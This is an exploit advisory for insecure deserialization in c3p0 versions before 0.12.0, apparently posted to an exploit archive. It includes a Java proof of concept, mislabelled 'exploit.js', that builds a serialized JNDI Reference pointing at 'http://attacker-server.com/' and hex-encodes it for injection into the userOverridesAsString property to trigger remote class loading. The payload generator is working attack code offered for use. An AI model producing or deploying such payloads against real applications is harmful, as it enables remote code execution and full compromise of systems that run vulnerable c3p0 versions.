============================================================================================================================================= | # Title : c3p0 prior to version 0.12.0 via userOverridesAsString Insecure Deserialization and Remote JNDI Class Loading | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://www.mchange.com/projects/c3p0/ | ============================================================================================================================================= [+] Summary : A critical vulnerability in c3p0 prior to version 0.12.0 allows attackers to achieve remote code execution (RCE) through insecure handling of the userOverridesAsString property in several ConnectionPoolDataSource implementations. Before version 0.12.0, this property was internally stored as a hex-encoded Java-serialized object. If an attacker is able to modify or inject a malicious value into this property — either directly, via crafted serialized objects, or through malicious javax.naming.Reference instances — the application may deserialize untrusted data. The risk is significantly amplified by legacy behavior in mchange-commons-java, a core dependency of c3p0. Older versions allowed ungated support for remote factoryClassLocation values, enabling remote class loading through embedded JNDI references. [+] During deserialization: The hex-encoded string is decoded into a byte array The object is deserialized Embedded javax.naming.Reference objects may be dereferenced Remote classes may be downloaded from attacker-controlled locations Arbitrary code may execute within the application's CLASSPATH This creates a full Remote Code Execution condition if the attacker can influence configuration properties or serialized inputs. [+] Impact Remote Code Execution (RCE) Arbitrary class loading from remote servers Full compromise of application runtime Potential lateral movement within enterprise environments [+] POC : exploit.js import java.io.*; import javax.naming.Reference; import java.util.Map; import java.util.HashMap; public class C3P0ExploitPayload { public static void main(String[] args) { try { // 1. Setup malicious server details String attackerUrl = "http://attacker-server.com/"; String className = "ExploitObject"; Reference ref = new Reference(className, className, attackerUrl); byte[] serializedObject = serialize(ref); String hexPayload = bytesToHex(serializedObject); System.out.println("--- Payload Ready for Injection ---"); System.out.println("Property: c3p0.userOverridesAsString"); System.out.println("Value: " + hexPayload); System.out.println("\n--- Note ---"); System.out.println("When this value is placed in c3p0 settings, the application will decode the Hex"); System.out.println("and deserialize the object, triggering a JNDI Remote Class Loading attack."); } catch (Exception e) { e.printStackTrace(); } } private static byte[] serialize(Object obj) throws IOException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(obj); oos.close(); return baos.toByteArray(); } private static String bytesToHex(byte[] bytes) { StringBuilder sb = new StringBuilder(); for (byte b : bytes) { sb.append(String.format("%02x", b)); } return sb.toString().toUpperCase(); } } Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================